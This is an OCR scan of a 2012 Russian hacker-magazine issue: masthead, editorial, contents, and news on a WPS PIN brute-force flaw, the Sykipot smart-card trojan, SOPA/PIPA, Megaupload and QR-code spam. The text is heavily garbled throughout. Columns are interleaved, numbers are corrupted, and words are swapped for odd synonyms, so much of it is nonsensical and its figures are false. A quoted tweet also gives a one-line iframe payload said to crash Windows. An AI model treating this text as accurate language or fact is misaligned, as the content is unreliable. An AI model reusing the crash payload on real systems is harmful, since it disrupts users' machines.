Page 0

Исчерпывающий чичероне по шоппингу на китайских интернет-магазинах


_.....

-пF.нЕР РЕДАКЦИЯ Главный вычитчик

Никиша (<nikitozz)) Кислицин

Шеф-редактор

Степура ((step)) Ильин lstepfareal.xakep.ru ) Николай ((gorl)) Андреев [ gorlumrarea l. xakep . гu l

Выпускающий вычитчик

[nikitoziOreal.xakep ru )

Редакторы рубрик

PC_ZONE равно UNITS

Степаня ((step)) Ильин

взламывание

РR-директор

Маг (maggiOreal.xakep.ru ) Андрей ((Andrushock» Матвеев landrushockiOreal.xakep.ru ] Александр «Dr. Кlouniz» Лозовский lalexanderlё!real.xakeo . ru] Николай <<gогi>>Андреев [gorlumffireal.xakep.ru J Анна Г риrорьева [grigorievafaglc.ru ]

Литературный вычитчик

Леся Болотникова

UNIXOIO да SYN/ACK MALWARE КОДИНГ

DVD Выпускающий вычитчик

Антоха с<аnt>>Жуков

Uniх-раздел Security - paздeл

Андрюха «Andrushock" Матвеев [andrushockffireal.xakep.ru ) Дмитрий «01g1 >>Евдокимов

Монтаж видео

Мака Трубицын

(antrareal xakep.ru ]

ART Арт-директор

Алик Вайнер 0~1

Дизайнер

Егорка Пономарев

Верстальщик

Веруля Светлых

Иллюстрация получи и распишись обложке

Александрушка Брички н

PUBLISHING Учредитель

000 «Г ей м Лэнд>>, 015280, Москва, 5 этаж, контора N<> 01. Т ел.: (4951935-7034, факс: (4951545-0906

у л. Ленинская Слобода, 09, Омега nлаза,

ПРИВЕТ С АНТАРКТИДЫ

Генеральныйдиректор

Димуля Агарунов

Генеральный владелец

мужественный Михайлюк

Финансовый руководитель

Андрюша Фатеркин

Директор соответственно маркетингу

Лена Каркашадзе

Управляющий арт ·директор

Алик Вайнер

Главныйдизайнер

Энди Тернбулл

Директор сообразно nроизводству

Сернуля Кучерявый

РАЗМЕЩЕНИЕ РЕКЛАМЫ

Две недели обратно получил особенное электронное письмо, которое меняпо-хорошемутронуло равным образом заставило раздуматься по отношению вечном. Писал

Т ел.: (4951935-7034, факс: (4951545 -0906

РЕКЛАМНЫЙ ОТДЕЛ

СерегаСильнов-редактор рубрики «Фри кинг >>, какой-никакой до сей времени

Директор груnnы TECHNOLOGY

на прошлом годуотправился во научную экспедицию вднтактиду.

Старшие менеджеры

Письмо из чего можно заключить особенны м, поелику зачем отправлено почти не со южного полюса да передано за коротковолновой сношения со скоростью бод путем

-50 неком мерческую радиолюбительскую ахан Wl NLl NK.

В письме Сергиян передавал приветы равно рассказывал в рассуждении своих впе­ чатлениях , которые на таком необычном месте рождаются с самых простых вещей.

Менеджер Директор корпоративной группы Старший менеджер Менеджер Старший трафик·менеджер

Ина Филатова (filatovaiOglc.гu l Ольга Емельянцева ( olgaemiiOglc . гu l Оксана Алехина falekhinaraglc.rul Елена Поликарпова ( polika r povalё!glc.ru ) [работа со рекламными агентствами] Кристина Т атаренкова [tatarenkovafOglc.ru ] Юлия Г ос подинова f gospoфnova fOglc . ru ] Мария Дубровская (dubгovskayaiOglc гu l Марья Буланова [ bulanovaГclglc:.ru )

ОТДЕЛРЕАЛИЭАЦИИСПЕЦПРОЕКТОВ

Впрочем, все каста романтика была только что сопутствующей вещью интересах

Директор

мужественный защитник Коренфельд l koгenfeldiOglc. гu l

Сергея, как-никак спирт приехал тама на составе экспедиции, которая должна

Менеджеры

Светуша Мюллер Наталия Тулинова

была пробурить 0 068 метров льда да обязательно дотян уться до подледного озера Восток, невыгодный навредив ему. Озеро действитель­

РАСПРОСТРАНЕНИЕ

а огромное:

Директор объединение дистрибуции

Кошелева Татиана

Руководитель отдела nодпис ки

Клепикова Витуша Oepikovalё!glc. ru )

050 километров

во длину, 00-в ширин у, да прежде 0.2-в

глубину. Учи тывая , который оно было изолировано через внешнего мира сотни тысяч лет, вопросы об обитающих на этом озере формах жизни и насчёт том, который суммарно с годами происходит, -ч ертовски интересны: до­ стоверно об этом человечеству ни ложки невыгодный несомненно . Не этак медянка целый ряд

осталось нате планетенеизученных уголков,- да чисто лиман Восток являетсяоднимиэтаких объектов.

Какова а была моя радость, рано или поздно настоящее [5 февраля) пишущий эти строки прочел но­

[koshelevalaglc.ru l

Руководитель

Лукичева Наталья Hukichevafaglc.ru ]

спецрасnространен равным образом автор

Претензии равным образом дополнительная ан фа: В случае возникновения вопросов по части качеству печати равным образом ОVО-дисков: claimlё!glc.ru . Горячая очертание до подnиске

Факсдля отправки купонов равным образом квитанций возьми новые подписки:

[495] 045-09-06

Телефон отдела подnискидля жителей Москвы: [495) 063-82-77 Т елефон интересах жителей регионов да в целях звонков со мобильных телефонов: 0-800-200-3-999

вость что касается том, который российская экспедирование достигла усишко пе ха идоб урила

Дnя nисем:

эту скважину, реализовав проект, длившийся побольше

Зарегистрировано на Министерстве Российской Федерации по мнению делам nечати, телерадиовещанию

00 лет! Чертов­

ски горд из-за Сергея равно его коллег-российских ученых, работающих в этой экспедиции равным образом решившихтакую сложную задачу! Выполняю

его просьбу: передаю что за диво во всем читателям Х вместе с Антарктиды : ).

001000, Москва, Главnочтамт, а/я 052, Хакер

равно средствам массовых коммуникаций ПИЯ Отпечатано во тиnографии

07-11802

через 04.02.2002.

Scanweb, Финляндия. Т равным образом фанатизм 019 033 экземпляров.

Мнение редакции безграмотный бесспорно совпадаете мнением авторов. Все материалы во номере

P.S.

Сергуся обещал проделать фотографию от вытоптанным во снегу

нате фоне полярной станции логотипом Хакера. Ждем его возвра­

щения:).

предоставляются во вкусе сообщение для размышлению. Лица, использующиеданную информацию в nротивозаконных целях, могут составлять nривлечены для ответственности. Редакция далеко не слабит ответ­ ственности ради суть рекламных объявлений во номере.За nереnечатку наших материалов без спроса- nреследуем.

По воnросам лицензирования равно nолучения nрав возьми приложение редакционных материалов

nikitozz, rn. ре д. Х shop.glc.ru/xakep vkontakte.ru/xakep mag

ХАКЕР

03/158/2012

журнала обращайтесь объединение адресу: contentragtc.ru .

© 000 «ГеймЛзнд», РФ, 0012

001


Content MEGANEWS

016

Колонка Степы Ильинна

017

Proof-of-concept

О хранении паралей

Все новое после завершающий месяцок

011

hacker tweets Хак-сценавтви ттер е

РЕГУЛЯРНО ПОЛЬЗУЮТСЯ

008

HEADER 004

0АМИЛЛИНОВАМЕРИКАНЦЕВ

ТЕХНОЛОГИЕЙ ОR-КОДОВ

За дач а: сосредоточить интересные показатели из PasteЬin . com

COVERSTORY

030

Большая охота Интервью не без; ведущим хед­ хантером рунета

COVERSTORY

COVERSTORY

018

02,

Ломаем Wi-Fi

Расщепляй да

из-за

властвуй

00 часов Получаем WPAключ чтобы Wi-Fi вместе с

Уязвимости рас-

через уязви-

са равно внедрения

моего технологии

заголовков на со-

WPS

временном вебе

щепления из-за тратить


048

038

PCZONE

-

UNIXOID

В небесная империя следовать покупками?

004

Свободачерезизоляцию

008

Федоринасча ст ье

Из в чем дело? состоят безопасные Liпuх - дистрибутивы

Семь китайских интернет-магазинов со всякой всячиной

042

Проверка для долговечность

Мини-обзор заслуживаю щ их внимания изме н е н ий

Тестируем универсальную распознавалку САР Т СНА

048

Фреймворкдля пентестера

во последних версиях F edoгa

Тестируем надёжность веб-приложения из через

01 О

wЗaf

052

Интегрируем Liпux равным образом <<облачные» сервисы

взламывание

-

SYN/ACK

Easy-Hack

014

В поискахинсайдера

020

Корпоративныесвязи

Борьба вместе с утечками корпоративной информа ц ии

Хакерекие секреты простых вещей

056

Достучаться вплоть до небес

Обзорэксплоитов

Анализ свеженькихуязвимсетей

Опенсорсные решения пользу кого централизованного

062

РНР - ботик с целью

управления доступом ко ресурсам

066

0сап сгасk it!

Создаем высокопроизводительный сайт

Решение заданий с целью хак-конкурса, учрежденного

со использованием

Windows

Кодим бота на распределенных вычислений

024

Испытаниенагрузкой

nginx да Django

Управлением правительстве н утнапиштим знакомства

Великобритании

070

Фальшивые

SMS: похудей вслед 00 дней!

Всяподного т ная известноголохетро н а

074

X-Too ls

-

FERRUM

030

От <<винта » ! Тестирование внешних жесткихдисков со

Программы на взлома

036

Ed i f i eг

WEXLER.BOOKТ7055

USB 0.0

R2500

Обзор универсальной активной стереосистемы

-

MALWARE

038

076

Веселая тройкабуткитов

-

И шве ц , равно жнец, равно получай дуде игрец вместе с ц ве т ным

Самыетехнологичные угрозы

0011

лета

на веселых картинках

082

Малварьдля мобильных << окошек »

Исследуем форма безопасности п опулярной ОС д лясмартфоновнапрактике

КОДИНГ 088

Формграббердля

FAQUNIТED

043

Диско

044

0.5 Гб всякой WWW2

Google Chгome

Расширяем внутренние резервы препроцессора С/С++ с помощ ь ю сторо н него кодегенератора

096

0адачинасобеседованиях П одборкаинтересныхзаданий,которыедают на собеседованиях

000

Паттерны проектирования <<Адаптер» равно «Фасад» Меняем равно н терфейсы классов помимо ущерба пользу кого з д оровья

Большой

FAQ всячины

Удобные wеЬ-сервисы

равным образом образ их перехвата на спринклер ре ото Google И целого Си скудно

юниты

040

Исследуем отправку зашифрованных форм

094

сенсор н ым дисплеем

010

0.0


MEGANEWS НОВАЯ ДЫРКА В WPS ОБЛЕГЧАЕТЗАДАЧУХАКЕРАМ БРУТФОРСИМ ЛЕГКО И БЫСТРО

GOOGLE ОБВИНЯЮТ В НАРУШЕНИИ ШЕСТИ ПАТЕНТОВ. Истцом выстуnает Bг i t i sh

Telecom -одна с круnне й ших во мире телекоммуникационных комnаний.

ТРОЯ Н ОХОТИТСЯ НА С МАРТ-КАРТЫ ВОЕННЫХ МАЛВАРЬ, ИСПОЛЬЗОВАВШАЯСЯ ДЛЯ АРТ -АТАК,

н

еприя т нуюуязвимостьна­

шел во не без; т андарте

СМЕНИЛА ПРОФИЛЬ

WPS [Wi- Fi

Pгotected Setupl исследо­

ватель на области информационной безопасности Стефан В равным образом бок, касательно чем и поспе ш равно л уве д омить U S-CERТ. Д ырка присутствует на продуктах мно­ гих популярных брендов, на томик числе

0-Link, Netgeaг, Linksys да Buffalo. Она позволяет ощутимо вывести время,

уходящее держи брутфорс РIN-кода, который необходим в целях установки беспроводного роутера. В результате о ш ибки ко атакующему возвращается слишком бездна информации относительно РIN­ коде, а непосредственно спирт становится слабее, что никак не г ативно влияет возьми защиту

тысяч, буде далеко не миллионов

Wi-Fi-

ма ршр у т изаторов да точек дост упа.

В

а

US-C ERT поясняют: «Если

nроверка

D

троянце

Sykipot, казалось бы,

пропал околесица особен­

ного- малварь, ориен т ирова нн ая получи и распишись п охищение

данных по части смарт-картах, никак не нова . Но безвыгодный кажинный

деньувидишь малварь, проект которой - смарт-карты

сотрудников Министерства обороны С Ш А равно п олучение с их помо щ ьюнесанкционированного д оступа ко по части г ра­

ниченным ресурсам. Именно т акие модификации во коде

до д линности РIN-кода завершилась

Sykipot обнаружили специалисты

неуда ч но, ступень доступа посылает

Одна с новых функций троянца обеспечи во ает взаимо­

сообще н ие

махинация от ПО

EA P-NACK н азад клиенту.

компании

Activ ldentity ActivC ii ent,

AlienVault.

ко через орое во вкусе однажды

Эти сведения пересылают ся таким

работает со смарт-картами, соо т ветс т вующими ста н дар­

образом,чтохакеруудаетсяопреде­

дальше безопаснос т равным образом Минобороны С Ш А. В американском

лить, является ли первая пятьдесят процентов

Минобороны такие карточки использую т ся пользу кого хранения

РI N - ко д а на ер н ой. Пос л едняя число

цифровых сертификатов рабо т ников равным образом их РI N-ко д об во , nри­

Отметим, что такое? ни нераздельно

сделано известна, этак в духе возлюбленная являет-

ме н яемыхдля аутентификации. В резул ьт атетехнического

изо производителей,

ся кон т рольной суммой РIN-кода.

анализа специалистам

В се сие зна ч ительно сокращает

последний разночтение стих скомпи л ирован е щ е во марте

мости, отнюдь не выпустил

количес т изумительный п опыток, требуемыхдля

хотя некто впредь до этих пор был далеко не чрезмерно свободно распространен.

ее коррекция .

усnеш н ого брутфорса: об н что касается снижается

Он ловок перехватыватьданные относительно сер т ификатах равно п ри

провиант которых подвержены уязви­

В своей статье Вибок пишет, который лучшим

не без;

способом борьбы

сяч>>. По д робнее об этом твоя милость можешь

димых РIN-кодах. После перехвата

п рочи т ать во одной с статей рубрики

краденую информацию н а защищенные р есурсы во Китае.

от дыркой в данный моментявляется

отключениеWРS .

00'8 д в отношении 00'3 + 00'4, ведь питаться давно 01 ты­

AlienVault посчастливилось на ыяснить, что 2011 года,

Соvе г Stогуэтого н омера.

помощи на строенного кейло г гера фотографировать дан н ые что до во во о­

Sykipot переправляет

Э т о, на п рочем, н е говорит насчёт т ом, сколько до л у ч атели верно н ных тоже находятся на КНР.

@wЗ bdЗvil

<iframe height='18082563'></i causes а BSoD on \vi.n 0 х64 via

Lol!

Yota КОМПАНИЯ <<СКАРТЕЛ>>

ПОРТЫ СТАНДАРТАUSВЗ.О

ПРОИЗВОДИТЕЛЬ LINUX-

СКОРО, наконец, nоявятся

ДИСТРИБУТИВАМАNDRIVА,

WINDOWSPHONE MARKETPLACE nерешагнул

KOMAHДAIPHONE DEV-ТЕАМ,

(БРЕНД УОТА) ЗАПУСТИЛА В НОВОСИБИРСКЕ nервую

получи смартфонах да nланше-

контролируемый российским

отметкув50тысячnри-

джейлбрейк nод iOS 0.01 чтобы

интернет

LTE во России . Сейчас

тах.ПоинформациисСЕS,

фондом

ложений. На сие магазину

iPhone45 равным образом iPad 0. За nервые

яруча включает6З базовые

nроизойдет сие во конце 0012-

дать знать что до банкротстве.

nонадобилось14месяцев

тридняутилитускачало

станции, да ко марту их поуже

го иначе говоря на начале 0013 года.

Увы, положение у комnании нисколько

(Andгoid Maгket на свое миг

больше одного миллиона

nлохи .

nотребовалось 09).

личность .

станет150.

001,

NGI, лихо может

наконец-то, выnустила

ХАКЕР

03 /158/ 0012


...;;; N

N

..; ш

u u

~

0-

=il

:J: а..

по отношению

LO

u :..: < :!Е

х

LO

:!Е L-

:J: ш

:..: :s: а..

LO

~

:J: ш

01ш

а..

~ :s: u

< :!Е ~ :!Е

ш ш а..

:!Е

ш

а а..

0:J:

относительно

:..:

g 1:: о

:J: ш

с:

011

что касается

0-

е

. м

:s:

Реклама . Товар произведен на соответствии не без; Техническим Регламентом для табачную продукцию.

~~dдr~~~~~r~d~~т~~ r~~~~~ ~rrд~~rrжд~rт:

~ ~rt~~t ~rtд~т ~~шtм~ dд~r~~ью


MEGANEWS

03% МИРОВОГО ОБЪЕМА ВЫПУСКА ФЛЭШ-ПАМЯТИ NAND скупила во четвертом квартале прошлого возраст Apple.

ПЛАНШЕТ, ПРИСТАВКА ИЛИ ЧТО-ТО ДРУГОЕ? СМЕЛЫЙ КОНЦЕПТ ОТ RAZER

nредварительно озвученыследую­ щиетехнические ха­

рактеристики : морда

размером 00,1дюйма

да разрешением 0280 х 800 пикселей , много­ канальнаязвуковая

подсистема Dolby

0.11п роектируемая вместесТНХI. сред­ ства беспроводного подключения

Wi-Fi802.11b/g/n и Bluetooth 0.0. Планиру ется вот и все

РАССМОТРЕНИЕSОРА И РIРАОТЛОЖЕНО О МАСШТАБНОЙ ОНЛАЙНОВОЙ АКЦИИ ПРОТЕСТА И ЕЕ РЕЗУЛЬТАТАХ

m

ы еще рассказывали что до «чудесны х» американских

зако н в отношении nр оектах SOPA IStop Online Р iгасу Act] равным образом

PIPA IPROTECT lntellectual Р горегtу Act], nородивших

волну негодования неграмотный всего-навсего возьми Заnаде, только соответственно во всех отношениях у миру. Для

тех. ктоумудрился постоянно для nустить. напоминаем: зако нопро ­

екты обязывают всех у ч астни засада се ти царство безграничных возможностей lпровай деры, хос тинги , п оиско ваша сестра е со равным образом не без; темы равно пр.] по мнению первомутребованию правообладателя !без решения суда] отводить пиратский контент равно прекращатьлюбые вза имоотно шения вместе с nират­

использоватьаксе­

екими сер на исам и. Платежные системы обязаны отключить

лерометры равно сенсор­

на озможность перев хвала д е н е г, поисковики -удалить ссылки

ный кино .

получай сайты да т. д . В случае невыполнения эт ихтребований ты считаешься соучастником да твой сайт могуттакже закрыть без свида равно следствия. Кстати, иностранные сайты, сервера

которых расположены на США. будут говорить такую но ответ­ ственность вслед запрещенный контент, в качестве кого буде бы они бы ли учреждены во Штат ах. Б олее основательно вместе с законо nроектами и их возможными последствиями дозволяется составить себя понятие хо тя

бы во В икипедии, а нас данный период сильнее интересуют n осле д ­ ствия. П оняв, в чем дело? «СО ПАблизка », крупные американские

корnорации ощу т либо угрозу для того себя любимых . За дра ко­ новские распоряжения выступили, для сравнение у, М РАА, RIAA да альянс BSA !членами которого являются Microsoft, Apple, Adobe, lпt el равным образом т. д.]. Зато напротив выеказались Google. Twitteг, Mozi lla, Facebook, Yahoo, еВ ищи-свищи да дру гие представители интернет­

на

м ериканекая общество Rаzегхорошо известна в во всех отношениях мире !в книга чис­

индустрии. Чем ближе становился « деньХ », держи кой было

ле равно во России] в духе исполнитель периферийных игровых устройств

запланированор воздушный ас смотре ние зако нопроектов во Конгресс~

равно принадлежностей. И нужно заметить, хороших- непостоянно мы п ишу эту но­

тем лишше накаляли из ь из тра сти. В осемна дцат ого января

вость, моя блат по образу единожды лежит держи мышке от былоувидеть

Project Fiоnа-проект,

Razer. Тем

интереснее равно неожиданнее

надо которым на комnании работаютсейчас

да какой был nредставлен получи и распишись выставке

CES 0012.

Эта концеnция nредставляет

на интернете прошла, пожалуй, самая массовая онлайновая акция протеста следовать совершенно эпоха его су ществования. Англоя­ зычная Википедия nровела самый глубокий во истории

из себя игровой nланшет, ориентированный для игры, для иболее nоnулярные сей­

опрос, nодавляющее значительная участников ко в таком случае рого

дни сверху ПК. в таком случае питаться получи зрелище <<nрожорливые>> равно мощ ные . Ус т ройство nланируется

поддержало устранение англоязычного раздела нате су тки

снабдить «интуитивными элементами уnравления» !кнопками да аналоговыми

на значок протеста.

джойстиками] вместе с с позиции силы обратной связью. Где то есть да как бы они будут расnоло ­

свойлоготип черным прямоугольником цензуры . Поддержа­

жены, здорово как мы погляжу бери иллюстрации. А гла вн ое, основой Pгoject

ли протести на WoгdPгess. В целом для задел протеста Ыackout

останавливаться nроцессор lпtel Соге

примкнулитысячи сайтов сообразно всему миру. Н еспадко пришло сь

со нехваткой игр ради планшета- задумка заключается во том, который фактически по сию пору

равно сторонникам SOPA. Та к. колоссальный на мире регистратор GoDaddy, nоддерживавший SOPA, подвергся жес т комубой­

Fi ona должен i7 третьего поколения. Заявлено, который в области этому вопро­ су общество грудь в грудь сотрудничаете lntel. Этот ходдолжен устрани т ь проблему

Reddit приостановил работу. Google прикрыл

существующие зрелище смогут нести записки и заботы получи устройстве помимо какой-либо nеределки

котуса сторо ны интернет-сообщества: пользователи приня­

иначе говоря доработки. Ты скаже ш ь. чт по отношению этотолько концепт. да будешь никак не прав. Специа­

ли сь тысячами у учить из вои домены через GoDaddy. Регистратор

листы Rаzегпочти готовы изъявить работающие образцы. Предполагается, зачем

оцени л ситуацию да поспешил отказатьс мы отсвоих слов,

поставки устройства начнутся уж во четвертом квартале текущего года. Стоить

хотя согласно зже во опрос TechCrunch шея из нил ось. почто

планшет обязан отнюдь не больше $1000.

nо-nрежнему поддерживаетSОРА ... В общем , отт ок хата е нов

GoDadd y

продол жается равно сейчас. Сдался nоддавлением народного негодования да организация

ВЗЛОМАН КРУПНЕЙШИЙ ОБУВНОЙ ИНТЕРНЕТ-МАГАЗИН В США.

BSA, заявивший , ась? SOPA «требует доработки ». П отом, уловив тенденцию. «пере д гений или » равно сенаторы, ратовавшие

из-за а нт ипиратские законоnроекты. В осем ь американских

законо дате л ейотк а вслед за лись п оддерживать SOPA nосле

08

ZAPPOS.COM УВЕДОМИЛ 0' МЛН

января равно Ыackout'a, кое-какие равно совершенно встали возьми сторону

КЛИЕНТОВ О ТОМ, ЧТО БД МА­ ГАЗИНА ВЗЛОМАНА И ИНФОР­ МАЦИЯ О НИХ МОГЛА ПОПАСТЬ В РУКИ ХАКЕРОВ

первоначально nр е дставивший законоnроектSО РА . отозвал его,

006

протестующих. И ась? во равно т оге? Конгрессмен Ламар Смит, из­ при знав, что такое? во нынешнем виде положение далеко не можетбыть принят.

Рассмотрение зако н оnроек та было отложено.

PIPA nо­

сти гла та но участь. Можно ли получай з вать сие nобедой ? Вряд ли. Л оббисты да копирасты рассержены, н в рассуждении останав лива ться они несобираются,полагая,чтосенаторов«затерроризировала бло г осфера». Теперьлоббист ы намере ны крошку nересмо­

третья часть n насчёт д шествие ко пробл еме. Звучит зловеще.

ХАКЕР

03/158/2012


0 ФИШЕК

BUFFALO CLOUDSTATION Собственный облачный сервер Buffalo CloudStation- сие не NAS. Хранилище

установившийся

Удобный бэкап Традиционно пользу кого решений

nросто

nозволяет

несложно предпринимать периферийный дост уn ко

данным чрез всемирная сеть nрактически не без; любых

Производительная

устройств: равно как со стационарного комnьютера,

набор

что-то около равным образом не без; мобильных девайсов.

Buffalo

бэкаn данных от клиентских машин

Несмотря нате комnактные размеры

орагниэовывается жуть nросто. При

[15Dx175x45 ммl , сетевое пинакотека

этом nоддерживается как так равно МАС

05.

Windows,

оснащено баста nрои зводитель­

Ус тро йство nоль-

ным а л езом, которое nозволяет никак не

ностью совместимо вместе с эnnловской технологией

всего лишь сформировать скорый сете­ вой достуn для файлам, а равным образом реализо-

Time Machine.

вать часть nолезные функции.

Встроенный

Припожения дпя

BitTorrent-клиeнт

iOS равным образом Android Приложение

Webaccess

Как равно относительная современных NAS'oв,

соз­

Buffa lo

оснащен встро­

дадено интересах удаленного дост у nа

CloudStation

вместе с мобильных усище тр ойств для дан­

ен ным ВitТоггеnt-клиентом вместе с

ным, хранящИмся получи и распишись решениях

удобным wеЬ-интерфейсом.

фирмы

Эту функцию соответственно достоинству

Bu ffalo.

Одновременно

nоддерживается порядочно

оценят любители интенсивно­

хра нилищ, а само nриложение

го р2р-обмена: валять торрен­

умее т делать вместе с файлами на сех nоnулярных форматов: с ви­ део, фотографий да музыки до раз ноформатны х д окументов.

твоя милость достаточно на разы удобней.

Перекодировка

Большой диапазон

медиафайлов

равно энергоэффективность

Bu ffalo CloudStation

умеет мотор -

матически кодировать огульно виде­ оконтент на нужном размере nри

удаленном достуnе со мобильных устройств. Та ким образом, можно удобно смотреть, наnример, видео сверху айфоне, малограмотный задумываясь

по отношению nерекодировке файлов.

Устройство nозволяет разместить в себя одиночный диск от

0 впредь до 0 Тб.

SATA-11

объемом

Среднее энерго­

n отребление nри этом безграмотный если т nревышать

06

Вт. При текущих

расценках в э лектроэнергию , на

година сие nозволяет выгадывать накануне

0

тысяч рублей, неравно обдумывать с обычным ПК .

ХАКЕР

03/158/2012

007


MEGANEWS

ИНДОНЕЗИЙСКИЙ ХАКЕР HMEI7 дефейснул махом цифра доменов верхнего уровня , принадлежащих компании S i emeпs.

QR-КОДЫ МОГУТ БЫТЬ ОПАСНЫ

MEGAUPLOAD

КИБЕРПРЕСТУПНИКАМ ТОЖЕ НРАВЯТСЯ НОВЫЕ ТЕХНОЛОГИИ

ФБРЗАКРЫЛООДИН ИЗ КРУПНЕЙШИХ ФАЙЛООБМЕННИКОВ

в отношении

ВСЕ

пасный случай создан во С Ш А-ФБР закрыло

нераздельно изо крупнейших Файлаобменников на узы

Megaupload, генерировавший, no его собствен­ 4% просто-напросто интернет-трафика. Похоже

ным данным, рядом

n

нате текстовка <<желтой>> новости , но, увы, сие реальность.

рактически целое интересныетехнологические новинки спозаранок либо время упущено оказываются «на служ­

По запросу американских спецслужб во Н овой Зеландии

бе» у криминала. Н е избежали этой участи да

вот и все были арестованы зачинатель nроекта Ким

QR-

продаж смартфонов , планшетов равно других мобильных

ное дедукция

девайсов.

чество,

Специалисты

Dotcom

Шмитц равным образом пока что три человека. Каждому с них грозиттюрем­

коды,популярностькоторыхрастетвместесувеличением

Websense ThгeatSeekeг Netwoгk об­

no трем обвинениям: 00 полет после мошенни­ 20 полет после отмывка денег равным образом по мнению высшая оценка полет вслед отдельный

прецедент нарушения копирайта! Помимо этого, выдвинуты

обвинения nротив трех граждан других стран. Эти человек

наружили сп а м-сообщения, ссылающиеся держи страницы со вс т роенными QR-кодам и. П касательно всей во идимости, в такой мере не без; па­

имели коэффициент ко проектам компании. П что касается мнению

планы обходят спам-фильтры равно пытаются раскрутить nоль­

Де n артамента юстиции С Ш А,

зователей откупоривать ссылки как вместе с через мобиль­

распространению пиратского контента . За пятерка парение рабо­

ных устройств. Сп а м выглядит на правах традиционная анонс

твоя милость дьявол как нанес индустрии развлечений авария во раз­

фар пишущий сии строки да содержитссылку получай сайт 0tag .nl -

мере $500 млн на виде недоnолученной прибыли . Кроме

во полне легаль­

ный сервис, позволяющий порождать QR - ко д ы к

того, файлаобменник породил <<криминальные денежные

URL-

потоки>> !от рекламы равно продажи премиум-аккаунтовl насумму$175м л н.

aдpecoв. Как только лишь читатель перехо д равно т п в отношении ссылке,

возьми экране отображается QR-код, а сnрава через него - адрес. Когда nользователь считывает QR-код, его устройство либо автоматично nереходит no зашифрованному адре­

су, либо сnрашиваету юзера решение lв зависимости от версии QR-читалкиl . Эту качество ле г ко не запрещается ис­ пользовать к распространения специфич н ой малвари

посредством уязвимостивмобильных браузерах : фактически обы ч но эти коды сканируют особенно не без; через смартфонов . Увы, этот «виток эволюции>> во атаках для мобильные девайсы предсказывали многие аналитики.

Megaupload сnособствовал

а

Уже nоследовала рефлекс других ресурсов от аналогич­

Поданным для омпа­ ни ис оm5соге , 04 м лн амери ко анцев

во возрасте через

08

ным функционалом : ко nримеру, выдающийся хостинг-сервис

FileSonic объявил по части полном

отключении файлаобменного

перед З4л е тр е гулярно

функцианала !составляющего, заметим, его суть) : ныне

используют

списывать контент, света вольного никак не видит другими nользователя­

домашние мобильные

у из т ро й ства дл я чтен равно ваш покорный слуга QR -к одов . А тогда ещ е недавно QR- для оды были по­ пулярн ы во осно вн в рассуждении м

н а Восто ке.

ми, невозможно.

Отреагировала равным образом «сетевая оппозиция>>-Апоnуmоus атаковали сайты ФБР, Минюста США , Белого дома,

RIAA,

М РАА равным образом заряд прочих организаций, ради действий которых был закрыт файлаобменный сервис.

THUNDERBOLTтм

оов

ИНТЕРФЕЙСТНUNDЕRВОLТСКОРОДОБЕРЕТСЯДОПК

РЯДНЕБОЛЬШИХКОММЕРЧЕ­

ANDROIDINVASIONCOCCЫЛKOЙ

HAБAЗEWINDOWS. Этy радостную уведомление сообщаетнам

СКИХ IPV6-CETEЙ пла ниру­

НАПРОГРАММИСТАGООGLЕСО­

словать DigiTime. По информации источника (данные по отношению ко­

ется устроить на Китае

ОБЩАЕТ, который Googl e на из кором

тором неграмотный раскрываются) , шеренга << железных » гигантов, таких

для концу201 0 года. А еще

будущем м ожет похерачить ваша сестра ­

какSопу, Asus, Gigabyte Technologyи ASRock, сделано боевито

во

запуск м обильны х n р оце не без; сорав

внедряетТhundегЬоlt во домашние nродукты. Новое крица

на Поднебесной стандартным

nод со обственнымтов а рны м

достоит учинить расправу вплоть до рынка во апрелетекущего возраст .

nрото ко олом .

з нако м.

0015 году 0Рv6должен начинать

ХА КЕ Р

03 / 058/2012


итоги

IGRDUPiB

КОНКУРСА НАСТАЛО ВРЕМЯ ПОДВЕДЕНИЯ ИТОГОВ НАШЕГО КОНКУРСА, КОТОРЫЙ МЫ ПРОВОДИЛИ СОВМЕСТНО С КОМПАНИЕЙ GROUP-IB, СПЕЦИАЛИЭИРУЮЩЕЙСЯ НА РАССЛЕДОВАНИИ ИНЦИДЕНТОВ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ. Напомним, на рамках соревнования было должен прочертить обнаружение зараз двух !Т-инцидентов: утечки конфиденциальных данных держи предприятии, а круглым счетом но взлома сервера нате базе Liпux.

Победителями конкурса являются [в алфавитном порядке):

КОНСТАНТИН ИЛЬИН

~Еонид WАнин

ст дент 0 курса Физико-технического

Род занятий:

У

института

НТУУ "Киевский политех-

нический институт", Киев.

Комментарии nобедитеnя:

«Конку рс понравился, провед

е н получай высоком техниче­

шил за блат

вместе с кусок ~ровне. Прдинятdь уч~~:~и~~сь хорошее впечатле­ с фреимворком

движение пе,

ние по отношению квалификации организаторов».

К сожале нию, обе щанный награда [трудоустройство на

Отчеты победителей

Group-IBI безграмотный подошел ни одному изо победителей:

опубликованы возьми нашем сайте:

Костюха учится на Киеве да все еще невыгодный может перевалить

www. xakep.ru/post/58241 0

во Москву, а Леонида целиком усище траивает да текущее место работы . Тем никак не менее, так чтобы весь было честно, наш брат

награждаем победителей ценными призами: каждый получает в соответствии с

iPad 0 Wi-Fi

ЗG

06Gb.

Будь со нами! Стань одним изо нас!


MEGANEWS

FАСЕВООКВЫПУСТИЛ СО6СТВЕННЫЙ МЕССЕДЖЕР к Windows, а ВКонтактетем временем те не без; тируетсерв да от видеозвонков

ДВАДЦАТЬ СЕМЬ СТЕКЛЯННЫХДЮЙМОВ НОВИНКА ОТ SAMSUNG НА РLS·МАТРИЦЕ

н

а прошед ш ей малограмотный д авно на Лас-Вегасе выставке

СЕ5

0012 близкие

последние разработки продемон ­

стрировали топо на ые производители <<железа»

со общей сложности мира. Интересного возьми СЕ5было много, хотя пере­ числить до этого времени мы, ко сожалению, далеко не имеем возможности, этак

зачем придется ограничиться малы м. Одной с самых ярких новинок, пре д ставлен н ых бери выставке, стал мони т оранье

027В970 по части т компании 0amsuпg, продолжающий 0-ю премиум - серию. Этот 07-дюймовый преобразователь интересен

тем , почто симпатия работает в основе технологии PL5 IPiaпe L iпe 5witchingl. П в рассуждении сути, сие род IP5 lln-Piane 0witchingl oт5amsung . Так что I Р5-матрицы получи и распишись нынешний момент являются <<вершиной трофический цепи», каста старая-новая т ехноло г ия заи н тересовала многих.

П ервый блинец

y5amsung,

однако, вышел комом: банан мо­

нитора для РL5-матрице, представленные во прошлом году, обладали букетом всех возможныхдефектов сборки, были помещены на тулово изо д овольнодешевого пластическая операция да на

результа т е имели засве т ы, битые пиксели равным образом т. п. П охоже, тепер ь 0amsuпg решил а ис пр авить э т с промах.

